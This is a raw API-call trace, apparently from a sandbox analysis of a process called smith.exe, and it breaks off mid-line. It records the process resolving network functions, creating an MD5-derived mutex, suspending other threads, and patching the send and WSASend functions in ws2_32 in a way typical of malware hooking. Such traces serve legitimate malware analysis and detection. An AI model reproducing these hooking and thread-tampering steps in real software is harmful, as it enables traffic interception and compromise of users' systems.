[0171.611] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0171.611] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0171.614] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0171.615] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0171.615] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0171.615] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0171.615] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0171.615] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0171.615] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0171.615] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0171.615] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0171.615] VirtualProtect (in: lpAddress=0x80000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x218f9c0 | out: lpflOldProtect=0x218f9c0*=0x40) returned 1 [0171.615] VirtualProtect (in: lpAddress=0x80000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x218f9c0 | out: lpflOldProtect=0x218f9c0*=0x4) returned 1 [0171.617] VirtualQuery (in: lpAddress=0x90016, lpBuffer=0x218f9b8, dwLength=0x1c | out: lpBuffer=0x218f9b8*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0171.617] GetProcessHeap () returned 0x300000 [0171.617] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x364) returned 0x320580 [0171.617] RtlMoveMemory (in: Destination=0x320580, Source=0x90016, Length=0x363 | out: Destination=0x320580) [0171.617] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x90016) returned 0x0 [0171.617] GetCurrentProcessId () returned 0x7d4 [0171.617] GetProcessHeap () returned 0x300000 [0171.617] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x105) returned 0x3208f0 [0171.617] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3208f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\smith.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\smith.exe")) returned 0x30 [0171.617] GetProcessHeap () returned 0x300000 [0171.617] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x105) returned 0x320a00 [0171.617] GetCurrentProcessId () returned 0x7d4 [0171.617] wsprintfA (in: param_1=0x320a00, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\smith.exe37084212420043") returned 62 [0171.617] CryptAcquireContextA (in: phProv=0x218f9bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x218f9bc*=0x320b50) returned 1 [0171.632] CryptCreateHash (in: hProv=0x320b50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x218f9c0 | out: phHash=0x218f9c0) returned 1 [0171.632] lstrlenA (lpString="C:\\Program Files (x86)\\Windows Sidebar\\smith.exe37084212420043") returned 62 [0171.632] CryptHashData (hHash=0x321460, pbData=0x320a00, dwDataLen=0x3e, dwFlags=0x0) returned 1 [0171.632] CryptGetHashParam (in: hHash=0x321460, dwParam=0x2, pbData=0x218f9ac, pdwDataLen=0x218f9c4, dwFlags=0x0 | out: pbData=0x218f9ac, pdwDataLen=0x218f9c4) returned 1 [0171.632] wsprintfA (in: param_1=0x320a00, param_2="%02X" | out: param_1="8B") returned 2 [0171.632] wsprintfA (in: param_1=0x320a02, param_2="%02X" | out: param_1="E8") returned 2 [0171.632] wsprintfA (in: param_1=0x320a04, param_2="%02X" | out: param_1="47") returned 2 [0171.632] wsprintfA (in: param_1=0x320a06, param_2="%02X" | out: param_1="DE") returned 2 [0171.632] wsprintfA (in: param_1=0x320a08, param_2="%02X" | out: param_1="3D") returned 2 [0171.632] wsprintfA (in: param_1=0x320a0a, param_2="%02X" | out: param_1="54") returned 2 [0171.633] wsprintfA (in: param_1=0x320a0c, param_2="%02X" | out: param_1="F2") returned 2 [0171.633] wsprintfA (in: param_1=0x320a0e, param_2="%02X" | out: param_1="EA") returned 2 [0171.633] wsprintfA (in: param_1=0x320a10, param_2="%02X" | out: param_1="1F") returned 2 [0171.633] wsprintfA (in: param_1=0x320a12, param_2="%02X" | out: param_1="4C") returned 2 [0171.633] wsprintfA (in: param_1=0x320a14, param_2="%02X" | out: param_1="0F") returned 2 [0171.633] wsprintfA (in: param_1=0x320a16, param_2="%02X" | out: param_1="E0") returned 2 [0171.633] wsprintfA (in: param_1=0x320a18, param_2="%02X" | out: param_1="A4") returned 2 [0171.633] wsprintfA (in: param_1=0x320a1a, param_2="%02X" | out: param_1="89") returned 2 [0171.633] wsprintfA (in: param_1=0x320a1c, param_2="%02X" | out: param_1="5D") returned 2 [0171.633] wsprintfA (in: param_1=0x320a1e, param_2="%02X" | out: param_1="FF") returned 2 [0171.633] CryptDestroyHash (hHash=0x321460) returned 1 [0171.633] CryptReleaseContext (hProv=0x320b50, dwFlags=0x0) returned 1 [0171.633] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="8BE847DE3D54F2EA1F4C0FE0A4895DFF") returned 0x80 [0171.633] GetLastError () returned 0x0 [0171.633] Sleep (dwMilliseconds=0x1f4) [0172.151] GetCurrentProcessId () returned 0x7d4 [0172.151] GetCurrentThreadId () returned 0xb38 [0172.151] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0172.154] Thread32First (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.154] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.154] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.155] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.155] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.155] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.155] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.156] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.156] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.156] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.157] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.157] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.157] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.157] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.158] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.158] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.158] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.159] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.159] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.159] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.159] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.160] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.160] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.160] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.160] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.161] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.161] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.161] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.161] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.162] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.162] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.162] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.163] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.163] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.163] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.163] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.164] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.164] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.164] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.164] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.165] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.165] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.165] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.166] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.166] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.166] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.166] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.167] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.167] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.167] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.167] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.168] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.168] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.168] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.169] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.169] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.169] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.169] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.170] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.170] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.170] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.170] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.171] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.171] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.171] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.172] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.172] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.172] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.172] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.173] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.173] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.173] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.173] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.174] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.174] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.174] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.175] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.175] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.175] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.175] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.176] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.176] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.176] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.176] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.177] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.177] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.177] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.178] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.178] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.178] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.178] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.179] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.179] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.179] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.179] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.180] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.180] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.180] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.181] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.181] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.181] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.181] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.182] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.182] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.182] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.182] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.183] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.183] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.183] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.184] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.184] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.184] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.184] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.185] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.185] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.185] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.185] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.220] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.221] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.221] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.221] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.221] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.222] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.222] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.222] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.222] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.223] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.223] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.223] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.224] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.224] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.224] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.224] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.225] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.225] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.225] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.225] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.226] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.226] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.226] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.227] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.227] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.227] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.227] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.228] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.228] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.228] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.228] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.229] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.229] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.229] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.230] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.230] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.230] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.230] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.231] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.231] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.231] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.232] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.232] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.232] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.232] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.233] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.233] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.233] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.233] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.234] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.234] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.234] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.235] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.235] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.235] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.235] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.236] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.236] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.236] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.236] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.237] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.237] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.237] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.238] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.238] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.238] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.238] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.239] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.239] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.239] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.239] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.240] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.240] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.240] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.241] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.241] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.241] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.241] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.242] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.242] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.242] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.242] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.243] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.243] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.243] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.244] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.244] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.244] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.244] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.245] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.245] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.245] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.245] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.246] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.246] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.246] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.247] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.247] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.247] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.247] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.248] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.248] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.248] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.248] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.249] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.249] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.249] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.250] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.250] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.250] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.250] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.251] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.251] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.251] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.252] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.252] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.252] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.252] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.253] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.253] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.253] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.253] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.254] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.254] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.254] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.255] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.255] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.255] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.255] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.256] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.256] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.256] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.256] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.274] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7c0) returned 0x8c [0172.274] SuspendThread (hThread=0x8c) returned 0x0 [0172.274] CloseHandle (hObject=0x8c) returned 1 [0172.274] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a8) returned 0x8c [0172.274] SuspendThread (hThread=0x8c) returned 0x0 [0172.274] CloseHandle (hObject=0x8c) returned 1 [0172.297] CloseHandle (hObject=0x88) returned 1 [0172.297] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0172.297] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0172.297] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x84224 | out: lpflOldProtect=0x84224*=0x20) returned 1 [0172.297] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x90000 [0172.297] RtlMoveMemory (in: Destination=0x90000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x90000) [0172.298] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x84224 | out: lpflOldProtect=0x84224*=0x40) returned 1 [0172.303] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0172.303] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0172.303] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x84224 | out: lpflOldProtect=0x84224*=0x20) returned 1 [0172.304] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xa0000 [0172.304] RtlMoveMemory (in: Destination=0xa0000, Source=0x75bc4406, Length=0x5 | out: Destination=0xa0000) [0172.304] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x84224 | out: lpflOldProtect=0x84224*=0x40) returned 1 [0172.308] GetCurrentProcessId () returned 0x7d4 [0172.308] GetCurrentThreadId () returned 0xb38 [0172.308] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0172.310] Thread32First (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.310] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.311] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.311] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.311] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.312] Thread32Next (hSnapshot=0x88, lpte=0x218f9b0) returned 1 [0172.312] Thread32Next 